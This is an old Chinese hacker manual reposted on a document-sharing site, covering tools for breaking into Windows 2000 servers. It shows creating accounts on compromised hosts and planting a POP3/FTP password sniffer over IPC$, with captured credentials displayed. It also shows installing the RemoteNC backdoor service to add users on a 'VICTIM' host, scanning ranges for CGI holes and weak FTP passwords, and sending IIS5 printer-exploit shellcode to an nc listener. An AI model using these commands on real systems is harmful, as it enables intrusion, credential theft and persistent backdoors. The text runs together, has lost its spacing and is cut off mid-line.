部分进程命令及软件使用说明.docx
- 文档编号:29171260
- 上传时间:2023-07-21
- 格式:DOCX
- 页数:31
- 大小:31.20KB
部分进程命令及软件使用说明.docx
《部分进程命令及软件使用说明.docx》由会员分享,可在线阅读,更多相关《部分进程命令及软件使用说明.docx(31页珍藏版)》请在冰豆网上搜索。
部分进程命令及软件使用说明
Q:
addusers命令的详细用法-批量
A:
1.导出当前用户:
addusers/d:
uc:
\user.txt
这样,将当前所有用户,本地组,全局组都导入了c:
\user.txt文件中.注意,这儿/d:
u参数中:
u是必须的,如果不加u,那么中文的2000将导不出用户和组的中文描述,从而生成不正确的用户文件,在目标机器上将产生不可预料的后果,这是我刚才测试出来的结果。
2.将c:
\user.txt复制到目标机器上,使用下面的命令:
addusers/cc:
\user.txt
将所有的用户导入目标机器中.这里需要注意一个问题.如果目标机器上有组名和用户名与文件中的用户或组名相同,那么目标机器上的对象将被保存。
3.导入完毕,所有新导入的用户密码都是空的,而且都要求第一次登录时更改密码.如果你不想密码是空的,你可以再编写个脚本转化一次user.txt,将用户密码加上,然后再导入目标机器。
4.addusers用户文件格式如下:
分三部分:
user,Global,Local
具体:
[User]
UserName,FullName,Password,Comment,HomeDriveAndPath,Profile,Script,
[Global]
GlobalGroupName,Comment,UserName,...
[Local]
LocalGroupName,Comment,UserName,...
你导出你自己的用户一看就清楚了,如果要加密码的话,可以将user段第三部分设置上符合你的密码策略的密码即可。
注:
addusers命令在Windows的ResourceKit开发包里,可以去MS的网站上下载。
我们在入侵服务器的过程中肯定遇到过这样的事情net被禁止无法创建用户对于一般菜鸟来说都是
放弃了其实有一个工具可以完成这个工作的他不需要net干涉这个工具就是addusers.exe
Addusers命令格式:
addusers[计算机名][/c][filepath]/p:
l/c/e/d
参数意义如下:
计算机名:
要建立帐号的计算机名
/c:
使用文件引入用户列表
filepath:
加/c参数后,指定文件路径
/p:
l/c/e/d:
帐号选项,其中:
l:
使用者下次登录时需更改密码
c:
使用者不得变更密码
e:
密码永远有效
d:
帐号暂停使用
例如:
addusers\\wgcnms1/cc:
\user.txt/p:
e
用户列表文件格式如下:
[User]
<用户帐号1>,<全名>,<用户密码>,
<用户帐号2>,<全名>,<用户密码>,
…………………………
[Global]
<新全局组名1>,<该组说明>,<加入该组的用户帐号1>,<加入该组的用户帐号2>,……,
<新全局组名2>,<该组说明>,<加入该组的用户帐号1>,<加入该组的用户帐号2>,……,
…………………………
[Local]
<新本地组1>,<该组说明>,<加入该组的用户帐号1>,<加入该组的用户帐号2>,……,
<新本地组2>,<该组说明>,<加入该组的用户帐号1>,<加入该组的用户帐号2>,……,
………………
注意:
addusers.exe不能识别中文,在上述文件内不可有中文字符,就连说明文字也不能是中文的。
群组每一行的结尾必须加“逗号”
例子:
[User]
ywj,YangWenjie,1975,,,,,
xxj,Xiaoxiaojun,1978,,,,,
limin,limin,1976,,,,,
[Global]
[Local]
流影POP3/FTPSniffer说明
FsSniffer只能在Windows2000中使用,可以捕捉到本机和基于非交换环境局域网的POP3/FTP用户名和密码。
一、本地使用
FSSNIFFER-S
BindIP:
指绑定的IP地址,通常就是本地主机IP地址。
Port:
控制的端口,以后要通过这个端口登陆上去查看结果。
ControlPassword:
登陆时的密码。
登陆上去后的命令
ShowResult:
查看捕获的记录
Quit:
退出
ShutDown:
结束Sniffer的运行
二、远程使用
例如:
得到主机211.152.188.1的一个属于管理员组的帐号test:
test,首先登录。
D:
\>netuse\\211.152.188.1\ipc$test/user:
test
Thecommandcompletedsuccessfully.
将fssniffer.exe复制到远程主机。
(也可以用流光IV中提供的工具“种植者”来做这件事情)
D:
\>copy"d:
\MyDocuments\ShadowSniffer\Release\FsSniffer.exe"\\211.152.188.1\
dmin$
1file(s)copied.
利用流光IV中的NTCMD启动FsSniffer.EXE,并将器安装成为服务
=============WindowsNT/2000NTCmdVer0.1forFluxayIV============
WrittenbyAssassin,XXeyes.org
NTCMD>ver
MicrosoftWindows2000[Version5.00.2195]
NTCMD>fssniffer.exe-ItesttestShadowSniffer211.152.188.17123456
FluxShadowSniffer(FTP/POP3)Edition,WrittenbyAssassin2001
TestSniffer1installed.
NTCMD>
这样在远程主机上面安装了一个服务ShadowSniffer。
用net命令启动服务
NTCMD>netstartshadowsniffer
TheShadowSnifferserviceisstarting..
TheShadowSnifferservicewasstartedsuccessfully.
安装成为服务的格式:
FsSniffer-I
UserName:
远程主机的用户名(必须具有超级用户权限)
Passwod:
远程主机的密码
ServiceName:
安装的服务名称,如果安装失败,可以将FsSniffer.exe改名再试。
BindLocalIP:
远程主机的IP。
某些主机具有两个IP地址,这是就需要根据需要选择监听的IP地址(例如:
局域网和外网)
Port:
远程控制的端口
ControlPassword:
远程控制的密码
过一段时间就可以登陆到FsSniffer开的端口7上面,查看结果了。
D:
>telnet211.152.188.17
ControlPassword:
**************
===============BanyetSoftLabs.1995-2001AllRightsReserved.===============
=========WrittenbyAssassin,ServerEditionFluxShadow@==============
====FluxShadowRemoteFTP/POP3SnifferBeta1,PleasedtoSeeYouAgain!
======
FluxShadowSniffer>showresult
===========FluxShadowSnifferEditionResults===========
211.152.188.112(1106)->211.152.188.1(8213)USERzjf
211.152.188.112(1106)->211.152.188.1(8213)PASS1qaz4rfv
211.152.188.1(8213)->211.152.188.112(1106)Userzjfloggedin.
211.152.188.1(8199)->211.152.188.112(1107)USERzjf
211.152.188.1(8199)->211.152.188.112(1107)PASS1qaz4rfv
Total10Sniffered
======================================================
FluxShadowSniffer>quit
三、其他
FsSniffer-L列出当前主机安装的服务。
FsSniffer-R
【RemoteNC】
RemoteNC是在NT/2000中运行的一个工具,和NC类似,可以远程执行命令。
和NC比较的优点在于:
1、远程安装启动,不依赖于Schedule服务。
2、可以以指定的用户身份运行,也可以以系统用户身份运行。
3、作为服务安装于远程系统,系统会自动启动。
4、快速。
近日提供下载。
D:
\MyDocuments\RemoteSVC\Release>RemoteNC.exe
=======RemoteNCBeta1,WrittenbyAssassin2001=======
XXeyes.org
Usage:
RemoteNC
RemoteHostIPAddress远程主机IP地址
AccountnameinRemoteHostWhoMustHas
AdministratorsPrivilege用户名(必须具有Administrators权限)
PasswordofAccountName密码
LocalSystemorRunAsUser启动模式:
LocalSystem(系统用户)RunAsUser(以前面指定的用户身份运行,推荐)
SpecifyServiceName服务的名称
DescriptionofService,DisplayedinServiceManager服务的说明,显示在服务管理器中,如果同名服务已经存在,将会安装失败。
ServiceListenPort启动后监听的端口
ControlPassword控制密码
例子:
D:
\MyDocuments\RemoteSVC\Release>RemoteNC192.168.0.1administratorpasswordRuna
sUser"RemoteNC""ProvideLocalCMDRedirect"7123456
=======RemoteNCBeta1,WrittenbyAssassin2001=======
XXeyes.org
[InstallServiceasRunasUserMode]
Connecting192.168.0.1.....Done.
TransfferFile.....Done.
StartService.....Done.
NowYoucanTenlet192.168.0.17toConnect,HaveaJoy:
-)安装成功
D:
\MyDocuments\RemoteSVC\Release>
D:
\MyDocuments\RemoteSVC\Release>telnet192.168.0.17登录到制定的端口
RemoteNCControlPassword:
**************
===============BanyetSoftLabs.1995-2001AllRightsReserved.===============
=========WrittenbyAssassin,ServerEditionFluxShadow@==============
MicrosoftWindows2000[Version5.00.2195]
RemoteNC>netuser
Useraccountsfor\\VICTIM
-------------------------------------------------------------------------------
AdministratorGuestIUSR_VICTIM
IWAM_VICTIMNetShowServicesTsInternetUserzjf
Thecommandcompletedsuccessfully.
RemoteNC>netusertesttest/add
Thecommandcompletedsuccessfully.
由于是以Administrators组的权限启动,所以不会出现1312错误。
如果是以系统权限启动,有时会出现1312错误,这就是推荐采用RunasUser安装的原因。
RemoteNC>
HScanV0.31使用说明
前段时间写了个PortScan,使用效果都说扫描速度很快,但就是功能太少了.
所以抽空继续写了写这个扫描器加了点功能.
1.内置扫描端口增加两个.达到32个.
2.端口扫描速度提高一倍.
3.增加CGI扫描功能,扫描800个CGI.扫描一台主机的速度在测试时拨号使用不超过3分钟.
4.CGI扫描增加了线程控制,一般情况下不用设置,除非你的网速低于30K.线程默认为200.
4.增加URL扫描,可以快速扫描一个网段有特定URL的主机.比如/scripts/root.exe.
5.增加FTP扫描,内置16个常用用户和20个常用密码.
6.增加ScanALL功能,将可以扫描目标的CGI,Port,FTP.不提倡使用ScanALL功能来进行网段扫描.
7.把扫描报告导出为html格式,查看结果更方便.
8.HScan的特点是速度快,体积小(仅仅18K),但缺点就是功能少.希望可以很快增加一些新功能.
使用方法:
D:
\>HScan
===================HUCSmallCommandLineScannerV0.31==================
===============ByLion,Welcometo===============
Usage:
HScan
-a
-c[Port]
-f[UserName|anonymous]
-p[Port|StartPort-EndPort]
-u
Example:
HScan-a192.168.0.1
HScan-c80192.168.0.1100
HScan-foracle192.168.0.1-192.168.0.254
HScan-p21-80192.168.0.1-192.168.0.254
HScan-u/index.htm192.168.0.1-192.168.0.254
1.[]里的为可选项,你可以不使用,<>里的为必选项,你必须填充它.
2.选项-a为扫描目标的端口信息,CGI漏洞和FTP简单密码.
ip地址和一个ip段来代替它.任何选项可以使用开始ip-结束ip来定义要扫描的网段.
比如扫描192.168.0.1到192.168.0.254网段的机器,可以表示为192.168.0.1-192.168.0.254
不提倡进行所有项目的网段扫描.也就是使用-a选项.
扫描的CGI,Port和FTP的使用方法为:
HScan-a
3..选项-c为扫描目标的CGI漏洞.
[Port]为指定CGI扫描的端口,默认端口为80.
[Thread]为指定cgi扫描的线程.默认线程为200.
扫描的httpd端口的CGI漏洞的使用方法为:
HScan-c
3.选项-f为扫描目标的ftp简单密码.
[UserName|anonymous]如果采用anonymous为进行匿名登陆的扫描,也可以使用真实的
用户名来代替UserName,将扫描特定的用户.如果什么都不填将扫描内置的16个常见用户.
扫描192.168.0.1到192.168.0.254网段的机器的默认FTP用户为:
HScan-f192.168.0.1-192.168.0.254
扫描192.168.0.1到192.168.0.254网段能匿名登陆的机器为:
HScan-fanonymous192.168.0.1-192.168.0.254
4.选项-p为扫描目标的端口信息.
[Port|StartPort-EndPort]可以为一个端口或者为开始端口-结束端口,如果什么都不填
将扫描内置的32个常见端口.
扫描192.168.0.1到192.168.0.254网段的机器的默认端口为:
HScan-p192.168.0.1-192.168.0.254
扫描192.168.0.1到192.168.0.254网段的机器的21到80端口为:
HScan-p21-80192.168.0.1-192.168.0.254
5.选项-u为扫描有特定URL地址的主机.
/c+dir.
扫描192.168.0.1到192.168.0.254网段有.ida扩展的机器为:
HScan-u/null.ida192.168.0.1-192.168.0.254
6.修补了CGI扫描模块扫描:
HScan-p80x.x.x.x.100时的参数处理问题.
这里感谢魔岩蔷薇发现并报告bug.:
)
1.HScanV0.1为端口扫描器,采用多线程扫描,
扫描结果保存为HScan.txt文件,
大小为6.5k.
2002/01/03
V0.2
1.调整了线程和线程处理
采用120个线程扫描端口,
在我的机器上找端口的效果比SuperScan3.0还好.
比如:
扫描一个C段254台主机的23端口,
只要1分30秒左右.
速度很快,
在一般拨号上网的情况下使用,
几乎没有误报现象.
2.修改了繁琐的参数设置
最简单的扫描方式只要后面带一个主机就可以了.
这将扫描内置的30个常用端口.
3.修改了结果显示界面
扫描结果的显示界面也好看一些了.:
)
4.内置30个常见端口
21,22,23,25,53,79,80,110,111,113,123,135,
139,143,443,512,513,514,515,540,1080,1433,
1524,3306,3389,5631,6000,8000,8080,12345
5.大小为6.5k.
2002/1/22
V0.3
1.增加CGI漏洞扫描功能.
2.增加FTP简单帐号检测功能.
3.修改了端口扫描处理,速度提高一倍.扫一个C段的23端口大概为40秒.比fscan还快.
2002/1/23
V0.31
1.添加一句语句,修补了CGI扫描模块扫描:
HScan-p80x.x.x.x.100时的参数处理问题.
这里感谢魔岩蔷薇发现并报告bug.:
)
2.添加18个CGI漏洞.
2002/1/29
1.添加17个CGI漏洞.
IIS5.PrinterExploit使用说明
本程序适用于英文版IIS5.0
1、首先在本机用NC开一个监听333端口。
C:
\>nc-l-p333
2、运行IIS5Exploit
D:
\>jillxxx.xxx.xxx.xxx211.152.188.1333
===========IIS5EnglishVersion.PrinterExploit.===========
===WrittenbyAssassin1995-2001.X===
Connecting211.152.188.1...OK.
SendShellCode...OK
IIS5ShellCodeSendOK
其中21
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 部分 进程 命令 软件 使用说明